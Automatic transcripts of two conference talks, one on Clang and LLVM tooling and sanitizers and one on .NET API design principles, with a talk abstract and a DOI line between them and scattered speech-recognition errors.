wrong with this code. This is actually a generated code, but somehow Qt's meta object compiler didn't generate or failed to generate, update the code. So we compiled this, and we got an error message that said the void value is not ignored. I recently compiled this with GCC 4.9. There's an improvement. It has a cursor here and also showing you the context. That's great, but the error message still stays the same. But that helps a lot because you can now see left-hand side and right-hand side of the assignment operation. If you compile this with Clang, it will tell you exactly what the problem is. So the problem is with assigning an incompatible type. It also highlights the region expression. Enableif is used all over the place. Anybody doesn't know what Enableif does. And if you compile this with GCC, GCC will tell you what went wrong with this code. What went wrong is that, well, there were some candidates and substitution failed so that there is no type in Enableif. If you compile this with Clang, Clang will cut to the chase and will basically tell you that it's disabled by Enableif because it predicated as return false. I think this is a much clearer response. I don't know how often this happens, but I like this a lot. You want to take an absolute value of an integer and unsigned integer, well, unsigned integer, unsigned integer and the double. Then you try to compile this with GCC. It will tell you that you didn't use this one because in my example I didn't use those. It basically will not tell you anything. But if you compile this with Clang, Clang will tell you that you're trying to take an absolute value of an unsigned integer. Likewise, for double, you can include CMath and use STD ABS. There's another example where we can diagnose or prove that we are... Yes. Yes. There's a special rule for absolute value function and it will detect that you're misusing it. That also applies to Enableif. It recognizes the pattern and it checks whether that's Enableif. It was this example. In this example, we're trying to access the n element of an array that actually is out of bounds. If you compile it with GCC, it will tell you that you didn't use J. So it doesn't diagnose this case. But if you compile it with Clang, it will tell you that you're trying to access an index that is out of bounds. Fixed ints and type of corrections are also really key features of Clang. In 2012, I think, Matt from Google has presented Google's build system statistics. It turns out that type of corrections help a lot to developers to have typos and Clang can suggest that you have a typo and you can fix it. In this example, we have a typo. We're missing a U here. If we compile it with GCC, it will tell you there's no cot. That's correct. There's no cot. But if you compile it with Clang, it will tell you there's no cot, but did you mean see out? It will highlight the area. It will suggest you a fixed int and also shows you where it's declared. The actual typo corrected recovered version. There's a syntax error here. I usually don't do it with an ableif, but I sometimes forget it. I think we're missing a type name here. If you compile it with Clang, it will tell you that you're missing a type name. It also gives you a parsable fix it which can be consumed by various tools that are also included in Clang. Or you can write your own tool that parses this format and fix the code for you. Xcode and various other IDs use that facility. I think this is my first ever patch to Clang. The destructor name does not match to class name. So you compile it with GCC, it tells you that, well, class name is expected and it can't find it, but if you compile it with Clang, it will also tell you what you should write there. If you use this with Xcode, Xcode will highlight and fix it, highlight that line and will have a fix it option for you that can automatically fix this issue. This warning has been implemented a year ago by another Google engineer, but it was pretty aggressive. I tried to compile our code at Cisco with Clang and I found that there were some header guards that are intentionally, sorry, there are some macros that are not header guards that are different. So we improved this algorithm last August and now it diagnoses that you have a typo in the header guard, but it doesn't warn you about the H2.h because we basically calculate the edit distance between this check versus this definition. If it's 50% different, that means it's intentional. The reason it's 50% is because the name could be short or it could be long, but it's not written in stone. We can actually improve that with some heuristics, say, macro names, short to then 10 characters can have three, the edit distance can be three. This is also a recent patch I submitted during the H2CU. So in this range-based for statement, we have a small typo, user has typed equals instead of a column. If you compile it with GCC, GCC will tell you that you're missing actually I think two semicolons, yeah, is diagnosing both cases. In the normal for statement, you would have three statements like initial condition and iteration statements. If you compile it with Clang, with a really recent version of Clang, actually, then you would get a fix it suggestion. We also try to recover from this. What we do is that we follow this declaration. If this is a single declaration and if we find an equals, we store its location, then we continue parsing. If we hit a right pran, closing pran, we're in C++11 mode, we suspect that this is a range-based for loop and then we say replace the equals with column. There are some other interesting features of Clang. I think this is Google's contribution to Clang. What it does is that it queries your AST and there's an extra tool, Clang query that enables you to write dynamic queries. Grab all regular expressions, your ID, some ideas are pretty good, are good at finding things that you're looking for, but often that's not the right tool. On the other hand, well, they can't handle preprocessive directives. That's one thing. AST measures null C++. They can parse the code. They can understand the constructs. They cover most of the cases. If you think it's insufficient, you can extend the AST measure functionality. There are some example queries that if you want to find all functions returning an int, you say function declaration returns an int. The syntax is also pretty intuitive, I think. Likewise, sanitizers are also contributions of Google. They're also available on GCC. These are not Clang-specific things, but I'm going to show you the Clang versions. What sanitizers does is that it does bounce checking, use after return, and envelope three, and memory leaks. One of my colleagues has recently encountered with an issue. He has written an image conversion function. He wrote his improved version, basically. But in his improved version, he wanted to improve it further by taking some of the function calls into a loop body. It turns out that he kept a variable name same as another variable in the for loop. So what happened was that he incremented it both in for body once and in the iteration statement once. He was skipping a few pixels in here and there. Of course, it was overwriting memory and it was crashing. He couldn't find it, but address sanitizers found it. Then we have memory sanitizer. Memory sanitizer can check accesses to uninitialized memory and it also can track its origins. Threat sanitizer is also an interesting one. It detects data races. The reason these sanitizers are separate, unlike Well-Grind, is that the sanitizers, they do one specific thing and they try to do it as fast as it can. We also have an undefined behavior sanitizer that tries to catch many undefined behavior cases. I'm going to try to demonstrate some of those. Question? No, you need to specify them separately. But sanitizers are LLVM passes. They emit code. For example, this is probably a simplest one. Area balance, we check if you know the area size statically and if you try to access beyond that, out of balance access. We emit some code while compilation. So when you try to access to that memory location, we trigger a runtime error. Clang also has a tool called Clang format that formats the source code. I said I don't like long lines. So white screens are sometimes not good for developers. They keep typing, typing, typing, typing, typing. The whole line goes beyond, I don't know, 120 characters. It's hard to read. I think we are, we can recognize patterns easily if they're like compact within a narrow area. We can quickly read them and recognize patterns. So Clang format would basically format this based on formatting specification you provide. There's also a tool called Clang modernize. Clang modernize will take your old C++ code like if you're trying to iterate from zero to n on a regular CRA or by iterators on a vector or with vector size, it will basically convert it to something more modern, C++11 change-based for loops. Clang also has a static analyzer. This is a great feature. It's integrated with Xcode as well. You can run this individually or you can integrate this to your build system. This is my first ever attempt to make a static analyzer. It might not make sense, but my purpose was to detect whether this area subscript has wrapped around somehow and it was coming from an untrusted source. This is a dynamic checker. It's a separate shared library. It's loaded by Clang. What static analyzer does is that it symbolically executes the code. It conjures a symbol C and then it says it basically conjures symbols for others and does the operation and here we create an assumption. While the assumption says this operation doesn't wrap around, in which case we stop following the path because everything is fine. And then other case, in other case, if it wraps around, we keep following the path. So the C in this case, in wrap-round case, will be used as an argument to function call f and in f it will be used as an area subscript. And we diagnose this case. We wanted to find it whether this symbol has been used as a subscript. It also supports dynamic checkers, meaning that you can extend it and this one was my first ever attempt to make a dynamic checker. I would also like to talk a little about lib C++. That's basically a kind of rerun of Howard Hinnan's slides. These are not my slides. Lib C++ was designed that the fact that in mind, lib STD C++ will also be loaded at the same time. So there should be some sort of compatibility between the two. And any exception thrown from lib C++ or lib STD C++ would look identical to the application. They're ABI compatible. And lib C++ is versioned with in line namespaces. This prevents any breakage, ABI breakage. For small containers such as deck, I can confirm these numbers. I tested it recently a few weeks ago. That in lib C++ size of deck and empty deck is 48 and it's 80 bytes in lib STD C++. Size matters because you want to move and fit things in the cache lines. And lib STD C++ allocates 576 bytes in its default constructor. For map, size is twice. There's no difference in default constructor. And on ordered map, there's not much difference in size, but there's a default construction cost. Sort in lib C++ never copies. It swaps or moves. So if you're dealing with strings, for example, this is going to be pretty fast. It tries to adapt to patterns in the input. If you try to feed it an all equal sequence of integers and if you want to sort it, the difference between lib C++ and lib STD C++ is 20x. If you feed it with an already distorted sequence, the difference is 10x. If the sequence is reverse sorted, it's 5x. It's in this shape, 3x and continues. Actually, these do seem like common patterns that you haven't already sorted sequence, then you want to insert something new and sort it again. So in this case, the performance gain is roughly 4 or 3%, depending on what you're inserting. Of course, this is not free. This pattern recognition costs roughly 5%. If you feed it with a completely random sequence. So we keep writing code. We love C++ and some of us just, you know, write crazy code for fun. But do we know how things work in compiler? How does compiler take that source code and make something that actually runs? So Clang is built on as separate libraries. These are some of the libraries used in Clang that you can individually link with. If you remember, the slide, the source code comes in. It's going to be a lexed and pre-processed. Then it will be parsed. Then semantic analyzer will try to create abstract syntax tree. So we have a code like this. I intentionally put this macro to show you the macro expansion. It's used here. One is lexed and pre-processed. It will, this keynote bug. The macro will be expanded. And then what parser will see is actually not the source code, but stream of tokens. When we create the ASD context, the first thing we do is to create the root of the tree. That's the translation of the decoration. And then parser will try to pull in lexed tokens. The first thing it sees is template keyword. What can happen after template keyword? What can come after template keyword? Okay. One more thing. Explicit instantiation. So, yeah, in this case, it picks up the template keyword, but it needs to check the next token. It could be a less than or it could be an explicit instantiation. If it's less than, then we're parsing a template parameter list. We still don't know what kind of template parameter list is it. It could be a specialization. So we keep parsing, pull the tokens in. When we hit here, we act on template parameter list. That basically creates a template parameter list and it checks whether something is wrong with it. Then it finds the struct keyword and the identifier. Then it acts on tag, meaning that it will create you the class template decoration and non-type template parameter decorations for bool, cond here, this parameter. And parsing will continue with left brace, first specification basically. Right brace, semicolon, yeah. So at the end, the ASD will look something roughly like this. Maybe I should have printed abstracts and text tree. There's a variable declaration. It's initializer. It's calling a function f whose argument is a conditional operator whose arguments are a binary operator and blah, blah, blah. So what comes next is that, okay, we have ASD. Now we need to run a front-end action on it. And if you want to generate an output for you, then code gen is the front-end action that will be running. There's also syntax only action that only checks the syntax, whether syntax is correct. So what code gen action does is that it visits all the top-level decorations. It's tree traversal. It creates the global variable i as the first thing. Then template instantiation which will be an int fint. Then it will call that with five because it finds that five is less than 42. That being said, I would like to show you some demos. I have created a small compiler. Where is that? So it will... So we're going to parse this. We say there's an external function called raise and it takes an argument and it returns an int. This is my dummy language. I was waiting at the passport here to police office and while sitting there I said maybe I can create an example compiler for this talk. I came up with this funny syntax. It looks like c2. Then we define our constants in this function, long max, long men and sigfpe. Then if we check whether adding a and b would overflow. If it does, then we will raise. This was a very good example for exercise for me too. So let's create an unoptimized version first. I think this was an optimized version. This is what it looks to LLVM. It creates a definition for our safe ad integer function. These are local variables. It will be allocated on the stack. Then it stores these constants in these locations. Then it does the comparisons and then it jumps around. If we compile this to an object file, then we have... We will try to add long max to whatever we specify in command line as an argument. Adder.o. Save adder. If you add zero, nothing happens. If you add four, then it will fail. I think I also have prepared you a greatest common divisor function. This can show you LLVM's control flow graph. How LLVM sees control flow graph of this function too. If we come back... GCD.demo. GCD.LL. By the way, maybe I should compile this previous example with optimizations on here. Let's say optimize.LL. No syndrome. Something is wrong with my demo. Let's see if this crashes as well. This worked somehow. GraphWiz.cfg.save. We are not interested with that. We wanted to see the optimized version of the generated. Let's show this first. This is the pretty printing of the abstraction text tree. I have written this parser. It's like Clang's parser. It's a recursive descent parser. Did I run out of time? No. You can see here that we have a compound statement, the function body, and then the binary expression and assignment on the left hand side. There's a variable named long max and then it is assigned to an integer literal. It's actually a long literal. This optimized version of... Yeah. Previously there were local variables here allocated on the stack. Now LLVM found that it doesn't need those things. It can basically put these constants in line. We also go to sanitizers. Yeah. Let's go to ThreadSanitizer first. This is based on... God. I mean, it's part from the DLSD Hutchins presentation from Google. They have a cache item. They wanted to store things in cache. When you look up an item in the cache, in this look up function, it tries to pin it so that next time... All right. It won't be a prune from the cache basically. After some time they will be deleted from the cache. There's also a scope look up class here that will try to use leverage ripe and in its structure it will basically release the key. It dumps it. The bug was here as you can see. Somebody forgot this curly braces. Put this in a scope. In that case, scope look up. This look up val object will be destroyed after the mutex has been unlocked and somebody could overwrite it. The LLVM says this costed a few man weeks to find and fix because everything looked really clear. If we compile this with clang, sanitize equals thread. CacheRace.cpp cacheRace. I'm going to use C++14. Oops. I don't want to use libstdc++ but I want to use libc++ that also requires c++avi. If I run this cacheRace, then it will tell me that all these threads, thread numbers, it basically tells you that somebody has written one byte and previous was written by another thread. See the thread number two and number three and number four. It seems like here somebody pinned it and then it's un-pinned but in a not unsynchronized way. But if we compile this with fixedRace, like put scope look up inside a curly brace and a block scope, then the look up val object will be destroyed before the mutex is unlocked and it will just run without any trouble. Yeah. OOB.cpp is also an out of bounds. Somebody tried to duplicate a string. Greats allocates memory. Great. Checks the return value. Also great. Stir copies it. Fantastic. Also freeze it. The problem here is that stir copy will try to insert terminating zero. Do I need C++7? No. In this case, the address sanitizer will tell you that you have a heap of overflow. Most of these things are, I think it can be easily called by Vellgrind but Vellgrind might be a few times slower than this. If you have a larger project, it will introduce a larger slow down. So what happened here is that this intercepted stir copy operation and it's called from this function. So if you go to that function, you can see that the stir copy is overwriting the heap. Yes. There's one more thing there. I always approach malloc plus one a bit cautious because if, I don't know how, but somehow if count is size t max, then if you try to add it one, it will wrap around. It will be zero. Malloc zero will return you either a null or some pointer that you can't, the reference, it will trigger undefined behavior. Yeah. I think I have seen this in real life. What is it? This one. Use after free. Not CD. Use after free. Not C. C plus plus. Yeah. Not exactly this but something like this. It's a mixture of C and C plus plus shared pointers. So an X object is created. Great. X. Yeah. As a shared pointer, then user gets a raw pointer to be passed to a C function but unfortunately here it already goes out of scope and that will be deleted. Use after free. CPP is after free. This also brings out a lot of information. So in X foo, we have accessed something that was freed which is called from my callback and if I go back to my use after free. CPP. Yeah. My callback calls this but the object has already been freed. And other than that, do we have an M-san example here? UMR.CPP. So we have an in pointer as a member. Then we create five integers in the constructor and we try to delete it into the constructor. It all looks fine but unfortunately we don't initialize the array. Oops. Memory. CPP. Then it will detect this that we try to access and maybe we can enable debug information. Does it help? Yes, it did. So in line 13. This was an initialized variable. Five. Sorry, where? U in five? Yeah, true. That's undefined. And finally, we have an undefined behavior sanitizer. I think, yeah, this is the case where we can't statically prove that array bounds. Prove that you're accessing beyond the, beyond the array. We're going to enter an index from the command line. So one would work. That's one to four. I think that's wrong. It should be zero to three. So if we try to access like six elements that triggers a runtime error, this could also, yeah. I think I didn't test this signed overflow recently. Yeah, it also catches signed overflow. I can directly run it. It tells you exactly, exactly the problem. So I think these are all about the sanitizers. We have a very short time. I will try to open source this LLVM demo, although there are a lot of LLVM examples around. But this one is a simple imitation of Clang, how Clang works, how it parses the code, how it transfers control to the semantic analyzer, and then generates AST, traverse the AST for creating an object file. So do you have questions? One thing. You don't talk much about lib Clang. I think lib Clang is that feature. Yeah. True. I personally never used that. I used the C++ libraries myself. But, yeah, as you said, it's lib Clang is used by many IDEs. And like there's some extensions to Vim that uses lib Clang to parse the source code and create some suggestions. I have no personal experience with lib Clang directly. But this example, for example, I have linked directly with LLVM. And if I create a tool, which I created a few tools before, I used the C++ libraries directly. Yeah. Yeah. There are some settings to modernize. I don't know that case. Honestly, I didn't work with modernize before. But modernize will ask you how much risk you want to take when you modernize it. Because when you modernize it, it will modernize it based on its own imagination, basically. So you tell them where to stop. It might be related to that. But you really don't know the answer. I need to check that. Any more questions? Yeah. Yeah. Yeah. Yeah. Yeah. Questions? Done? Right. Thank you very much. If you can vote me. Green is your favorite color. I assure you this there's no way to this confusion if you let it wish you well
|
LLVM came a long way from being a research project to a production quality environment for building compilers. Clang is built on top of LLVM and is a leading compiler for C family languages. Hands-on demonstration of clang's technical advantages, tooling support, and bleeding edge C++1y implementation.
|
10.5446/50807 (DOI)
|
Hello. Are we good? Can anyone hear me? Awesome. OK, so we'll get started. So hello, everyone, and welcome to the session. It's wonderful.donate API design. So we'll get started with some introductions. So my name is James Huydon-King. I'm from Wellington, New Zealand, all the way down there. And I've been a Donate developer for a little over 10 years. If you're familiar with Flight of the Concords, they have some wonderful demotivational photos about posters about New Zealand. It's a lot further, having just flown on a couple of days ago. So probably what I'm best known for, about eight years ago, I started a project called JSON.NET. And from that project, I've gained, and just from regular Donate development, I've gained quite a bit of knowledge about API design. And I think it's a little known skill that's talked about amongst Donate developers. There's been a lot of focus on REST API design. I think it would be good to focus a bit on Donate API design. So to get started first, what is Donate API design? What is a Donate API? So really an API is types, it's properties, it's methods. So it's the members almost types, it's constructors, it's perhaps more Donate specific constructs like events. It's really the code that you interact with when working with a library. And API design is really about communicating what an API does. If you could stand over the shoulder of every single developer who was using your code, you wouldn't need to worry about API design because you could just tell them. But because you're not there, you need to create APIs that are able to communicate to users. Yes, so communicating to developers. So imagine, so we'll give a little example. Imagine we've got some code here. We're connecting to a database. We're getting a count from a database table, and then we're returning that. The problem with this code is we're creating a connection to a SQL database, but we're not closing it. The way as an API designer, you communicate to a user that there is a resource that they need to clean up is you make it implement iDisposable. As soon as you implement iDisposable, that developer should be able to see that this is something that they need to clean up. And if they don't already know that, then hopefully either Visual Studio or a tool like Resharpid does tell them. And when they see that they need to clean that code up, they'll just change their usage of the API. So in this case, it's the SQL database API, and close their connections and fix their code. So it's all about creating code which communicates to developers how they should use it. So why is API design important? So it's potentially the difference between an API that discourages users, waste their time through them going through trial and error, having to look at documentation, and a good API which is creating productive and happy users. API design is also important because APIs are forever. So ideally, any API, so any code which is designed to be reusable, shouldn't change. So I've got a little star against APIs are forever, because there's sort of like a range of how much change you're able to do to an API. If an API is for internal use only, so really you're just referencing another project, and perhaps it's a reusable data layer to talk to your database, then it's pretty easy to change. If you rename something, and there are perhaps a method, then Resharpher or Visual Studio will automatically rename it throughout Visual Studio, throughout the rest of your solution. If you're shipping a DLL within your company, that's perhaps slightly more problematic when making changes. If you're publishing a framework on Nougat, that's harder still, because you aren't able to immediately communicate to your users that the API is broken. The worst case scenario is if you're publishing a Nougat package, and then that Nougat package is dependent upon other Nougat packages, you make a change which breaks other Nougat packages. Anyone who uses those Nougat packages is broken until those other library authors go and update their own packages. So the worst case scenario happens to be my own library, json.net. So this was created by a developer, a program manager, on the Nougat team. And at the bottom of an inverted stack of cards is json.net. If I make a breaking change, then I could potentially break hundreds, maybe even thousands, of other Nougat libraries. 1,500 other Nougat libraries depend upon json.net. So when you get to that sort of scale, APIs really are forever. And you make a breaking change to a low-lying library like json.net or the.NET framework, you're going to create a lot of unhappy developers. And the thing about APIs is every piece of code that uses that API in its current form is an investment in it. If you're breaking APIs, you're destroying that investment in that API. API design is important because everyone really is an API designer. Code should not just be maintainable. Ideally, it should be reusable. So you want to aim for dry. Don't repeat yourself. So really, when you're designing APIs, this might be your payment service within your own solution. These are some.NET classes, methods, properties. This is an API. You want to think about reusability. So thinking about API design encourages good programming. So what makes a good API? A good API should be both easy to learn and easy to use. So easy to learn. It should be consistent with the platform. If you're working in the.NET environment, if you're publishing a.NET package, you should follow the.NET naming standards. You should use.NET constructs. Like if you're communicating with the file system, you should talk to streams. You shouldn't invent your own way to talk to the file system. A good API should be consistent with itself. If you're doing two tasks and two separate places, you should do those two tasks the same way. You shouldn't unnecessarily complicate and confuse things for your users. And a good API should be easy to use. So it should be well-named. You want to aim to make it as strongly typed as possible. Ideas are fantastic. Visual Studio, amongst Tony developers, is fairly ubiquitous. IntelliSense is awesome. So strong naming is strongly typed classes are your friends, it helps with IntelliSense. So with the easy to use, you also conversely want it to be hard to misuse. So for example, if a user does something wrong and they do a set something to a bad value, you want to validate that and throw an error quickly and tell them that they've done something wrong. So perhaps an example of some bad classes, a bad API with them in the.NET framework, is this code. So just immediately looking at it is not following the.NET naming standards. Imagine if you will that these were constants instead of enumeration. So enum provides a great strongly typed way of telling a user what values are available. So you'll get a compile error otherwise. This code is invented its own way to talk to a file system. It's using its own custom file adapter rather than just taking the built-in.NET stream. And it's using setters instead of properties. So it's not using the built-in.NET, well, in this case, C-sharp language features. So this might be an example of a Java API that someone's ported directly to.NET without putting in the time and effort to make it easy to use within the.NET environment. And I don't know about you, but if I came across having to use this sort of library, I'd be very upset. It's not pleasant code to use. If anyone's ever used a Java port to.NET, it's not a pleasant experience. So a good API should also encourage code that uses it to be easy to understand and maintain. So an example I can think of that is imagine this is an in-hybernate mapping class, or mapping configuration XML file. So in-hybernate is a.NET ORM. This piece of XML is mapping a.NET type to a database table, and that's what it does. The problem with encouraging code like this, in this case, XML, is it's verbose. You're having to go in. You're manually typing it, and it's brittle. It's not strongly typed. If you rename your.NET class, then this is going to break until you run. If you compare that to something like using just plain attributes, this.NET class with attributes, it's reusing the property names rather than having to specify them manually like you were in the XML. By placing a property on an attribute on a property, you're going to immediately use both that property name. You can use that type, likewise with the ID. So this sort of pattern is like convention over configuration, and it's sort of leveraging the built-in type that you're already using rather than having to duplicate all the mapping information in a XML file. And it's leading to code which is both easy to use and understand and maintain. You want to create APIs that are sufficiently powerful to meet requirements, but not overly powerful. So when designing APIs, there's often a conflict between two separate worlds, there's creating both API that is powerful enough to meet the needs of a broad range of developers, but is still simple for users who just need a small subset of it. So when you're designing an API, you just need to be careful that you don't ruin simplicity by being overly powerful. A good API can also evolve. So bugs can be fixed, features can be added without making breaking changes. So a good example of that is the.NET framework. So it's maintained compatibility pretty well over the years, while still being able to add lots of new features. So now we'll talk about a bunch of general API design principles. And perhaps the most important principle is the pit of success. So this is a term that was coined by an employee at Microsoft. So the pit of success. In stark contrast to a summit, a peak, or a journey across a desert to find victory through many trials and surprises, we want our customers to simply fall into winning practices by using our platforms and frameworks. To the extent that we make it easy to get into trouble, we fail. So success shouldn't be climbing a mountain. Users shouldn't need to figure out how to make complex configuration files or understand complex processes. It shouldn't be like trekking across a desert. You shouldn't need to write tons of boilerplate code to successfully do a task with an API. You shouldn't have to wade through tons of documentation, tons of methods and settings on many different classes to find what you want. Success should be as simple as falling into a pit. So the goal when you're designing APIs is to make it easy to succeed and hard to fail. And hopefully we'll look at a whole bunch of ways of doing that throughout the rest of our presentation. Another general principle is the wall of complexity. So the wall of complexity is the idea that your API should offer a steadily increasing slope of difficulty as their usage becomes more complex. So if your user is suddenly requiring a huge increase in knowledge or a huge increase in efforts to perform an additional minor task, that's an example, perhaps, of them running into a wall of complexity. So imagine you have an amazing form and suddenly you need to do a specific bit of custom validation and what you expected to take 30 minutes takes two days. That's an example of you hitting a wall of complexity. And chances are when a user hits a wall of complexity, they're going to fail. And they're not going to have a pleasant experience. It's great, isn't it? So an example of a framework that I think hits a wall of complexity is the good old ASP.net web forms. So web forms was advertised as a way of creating rich web pages on the server using simple drag and drop into an IDE, double click on a button, and suddenly you've got an event and everything's nice and simple. The problem with web forms is if you need to suddenly start performing even moderately complex tasks, if you need to perform even moderately complex tasks, you suddenly hit this enormous wall of complexity. Of all this knowledge, you suddenly need to understand about the ASP.net lifecycle and the web form page lifecycle, all the events that happened. So this is like a diagram showing all the different events that can be raised off a web form's web page. So you need to know when the post-back happened, when data binding happened, when rendering happened. So for me, I always hit this problem when suddenly you needed to post-back values to data bounds, drop downs, and a repeating list. And suddenly you need to worry about what's going to happen, and suddenly you need to worry about what order you bound the list, what order the post-back values were applied to this list. It all became very complex. And all from a framework which is advertised as something which is meant to be just drag and drop and double click and you're done. So a framework which did it better, in my opinion, is the MVC. So obviously MVC, it requires you to have some knowledge of HTML and have some knowledge about HTTP. But it's really a steadily sloping increase of difficulty as you do more and more complex tasks. If you need to suddenly do complex Ajax callbacks and you have complex JavaScript, well, that isn't suddenly orders of magnitude more difficult than what you're currently doing. MVC provides nice hooks for you to add in complexity, but you only need to hook them in when needed. An example of a framework which does this wall of complexity really badly, and it's almost an anti-pattern, is WCF. So WCF puts all the complexity up front, even if you're doing a very simple task, like you want to have a basic HTTP service and you want to give it some XML and get some XML back. There's all this configuration. There's all this knowledge, all this learning that you need to understand, especially the configuration. I could never get it right. And you need to all understand that all up front. And it's not a great framework. So the next general principle is the power of sameness, which sounds kind of weird. It's a term coined by a guy called Brad Abrams. And he's a ex-Microsoft employee. And the idea of the power of sameness is by creating APIs that use features that developers already know, developers can quickly achieve tasks because they already know how to do it. An example, and this is the example that he uses, is that of interacting with the car. No matter what car you're working with, well, you're in, whether it's a taxi, it's your friend's car, it's your own car, it's a car you're renting, door locks tend to work the same way. If you're confronted with a door and you need to unlock it, chances are you don't need to ask for help. You don't need to read an instruction manual because they tend to work all exactly the same way. And that's the power of sameness, likewise with a seatbelt. All seatbelts tend to work the same way. So if we imagine that within the context of a.NET API, you want to use naming standards that everyone's familiar with. You want to use common types and interfaces like I dispose of at everyone's familiar with stream. You want to use configuration patterns that people are familiar with. So you want to use web config, app config, to put configuration rather than your own custom files. By using these techniques that developers already know about, you're helping them fall into a pit of success. They already know how to do these things, so they don't need to learn them again just for your own API. So when you're starting out designing an API, probably one of the most important things is you want to start small. You want to start small because you want to firstly provide a solid foundation, but also because you want to release quickly. You want to release quickly because at least initially you're just guessing how your API is going to be used. You don't know exactly all the different ways developers could potentially use your API. So the sooner you release, the sooner you can start getting feedback. And by starting small, you're minimizing potentially the amount of changes that you need to make. So if you've already made mistakes, the number is smaller. What you want to think about with this is incremental improvement is better than delayed perfection. And that's especially important because your idea of perfection could be quite different than what your user's idea is. You want to listen to user feedback. But when listening to user feedback, you need to be able to decipher what users say versus what they mean. So users will tend to suggest for features, specific features that solve their problem and perhaps don't address other people's problems. So imagine if you will, you had a custom list class. It has some strings in it. And you had a method to sort. A user of your API will tend to come along and suggest, what you need is a new method that sorts in exactly this way that I want it to sort. And what you could do is you could add a new method on. Crazy user sort. It implements a sort for them. And that's what they've suggested. But while that works for them, it doesn't work for other developers. So you would need to, each new developer who uses your API might come along and request a new sort mechanism. That's bad, both because it's putting lots of work on you. And it's bad for your users because they're waiting for you to add new sorting methods. So you don't want to do that. What you really want to listen to is what they mean. What they mean is they want a way to be able to customize the sort, and they want a way to be able to do it themselves. So this is an example from the.NET list class. And it has a sort function on it that takes a comparable delegate. The delegate takes two values. And then within it, you can hook in your own custom comparison logic and then sort it yourself. And by doing this, you've created a mechanism that works not just for the developer who said they needed a way to do custom sorting. It works for all users of your API. So as well as positive feedback, you can also get negative feedback. And just because it's negative feedback, it doesn't mean you don't want to listen to it. So there's this quote from Benjamin Franklin. Critics are our friends. They show us our faults. So it might be a user complaining on Twitter about how horrible something is. But you want to think about what they say and think, is there a way I can solve their problem for them? So expect to make mistakes, especially at the start. So your initial release, you're really just guessing what users want and how they'll use your API. So it's quite easy for you to make mistakes. And you should pretty much expect to do so. So the way you can get around this is starting small and releasing often. So that both minimizes the amount of changes that you'll make, so the mistakes that you've made, they've been minimized. And that whole releasing early and often incremental improvement. If you do make a mistake, don't be afraid to make types and members obsolete. So to do that, within the.NET framework, you place an obsolete attribute on a member that will show up in tele-sense. It will be crossed out. So all new users won't use it. And any existing users of your API, when they recompile, they'll get a compiler warning. And within that attribute, you can provide a description of what they should do instead. Not all feature suggestions are good. And also not all pull requests, if you've got your source code on something like Git, is good. Don't be afraid to say no if you don't think it's a good feature. With features, you want to think about quality over quantity. You want to focus on doing a good job for the most users possible. And if you can help those perhaps non-normal use cases without hurting your core users, then that's great. Perhaps accept those pull requests. But otherwise, don't be afraid to say no if you don't think it's appropriate for most users. So those are the general principles of API design. So the rest of the presentation, we're going to focus on lower level API design and how it relates specifically to.NET. So the.NET framework has extensive naming guidelines. And for the most part, unless you've got a very good reason otherwise, you should always follow them. So the first one is always Pascal case, namespaces, types, and delegates. So Pascal case, as you can see on that slide, each word should start with a capital letter. You also want a Pascal case, methods, properties, fields, and events. And you want a camel case parameters. So the.NET naming guidelines are pretty simple. Pascal case, everything except parameters to methods or constructors, and camel case those. You'll note in this code, I have a private field and it's starting with an underscore. The naming guidelines are really just for public members and public types. Anything private or internal, users won't see anyone who's interacting with your API won't see. So you can name those however you want. I've always done an underscore on my private fields. But yeah, whatever you want. One interesting rule that a lot of people don't follow is you want to always Pascal case acronyms that are three letters and longer. So some examples. In the.NET framework, it is an XML document with XML all uppercase. It's XML document with XML Pascal case. Likewise, HGB client. But then if it's only two letters, so in this case, IO exception, you can leave those both as capitals. Some additional tips when naming your types of members. You want to avoid acronyms. So a good way to test whether an acronym is acceptable is just go to Google. And if lots of people are referring it to it by the acronym, so if people are talking about HTML rather than Hypertext markup language, then the acronym is great. Avoid abbreviations. Well, I'd say even stronger. Don't abbreviate. So IDEs these days. So Visual SEO, you have auto complete. Typing, writing code, that's fast. You write code once. You read it dozens of times. So you want to make your API optimized for readability rather than quickly writing it within reason. So that will help avoid developer confusion when reading your APIs. So a bunch of other random tips. So interfaces, start those with deny. Generic type parameters, start those with a T. So in the case of dictionary, a generic dictionary, it takes T key and T value as its generic types. And then there's a bunch of.NET types that when you inherit from them, you should always suffix with a certain bit of text. So attributes should always end with attributes. If you're implementing your own custom exception class, it should always end with exception, stream with stream, and so on. So interface and abstract base class design is interesting. So there's a bunch of common pitfalls that people make when implementing interfaces and abstract base classes while designing them. So the first one is they put too many methods on an interface or an abstract base class. So the canonical example, the one that I always think of, is the old membership provider in ASP.NET. So all these types, and all these properties, are declared as abstract on this base class. And whenever you implement it, you need to implement all of them. So quite often, I've needed to implement this to plug it into some other application. And all I needed to do is to do validation. And all I end up implementing is if you can read it closely, there's a validate user there and a get user. So those were the only ones that the other framework was using. But because this base class had all these abstract members on it, I had all these additional methods. And I just had to leave them as not implemented exceptions, throwing not implemented exceptions. So if you're familiar with SOLID, this is an example of the interface segregation principle. So you want to keep your interfaces small and focused, and likewise with your base classes. So the other common pitfall is having a method that is impossibly complex to implement. So a good example of this with the MedotNet framework is Iquariable. Iquariable takes has just a couple of methods on it that you need to implement. But one of them takes an expression tree. An expression tree can be an expression tree of any expression. And really, Iquariable needs to be able to handle any expression given to it. But really, there's actually only one proper implementation of a link provider. And that's link over in memory data structures. Every other link provider, like NT Frameworks link provider, if you give it a certain expression, it's going to fail. So I'm not saying in this case Iquariable was bad for this specific case, but it's something you want to keep in mind. Have you got a method on your interface or abstract base class that is just impossible for the average person to properly implement? So also with abstract base class design and interfaces, you want to provide an implementation, and you want to provide consumers of this implementation. By doing this, you're ensuring that you've thought about how your interfaces or base classes should be used. So an example I can think of in the.NET framework of where this wasn't done is Iquariable. So Iquariable shipped in.NET 1. And some classes implemented Iquariable, but no APIs actually consumed Iquariable. And unfortunately, the Iquariable description of how it should work is a bit ambiguous. Like should Iquariable clone just the current object? And not as child object? Should it clone all its child objects? Do all its child objects then need to implement Iquariable before they can be cloned? And because it wasn't properly defined how it should work, and because no one actually used it in the.NET framework v1, it's sort of become this orphaned interface that's never been used. And because it's already in there, it can't really be reintroduced now and done properly because it's been taken up. So this would be a case of something which perhaps should have been left out, and then added if needed at a later date. And because it's never used, it's forever alone. So structs are interesting. So structs are similar to classes. You can do a lot of the same things you can with classes. The difference between structs and classes is that structs aren't allocated on the heap. They're value objects. They're on the stack. And because of that, there's no need to allocate them or garbage-click them. So they have some potential performance benefits. But there's only a certain number of circumstances when you want to use a 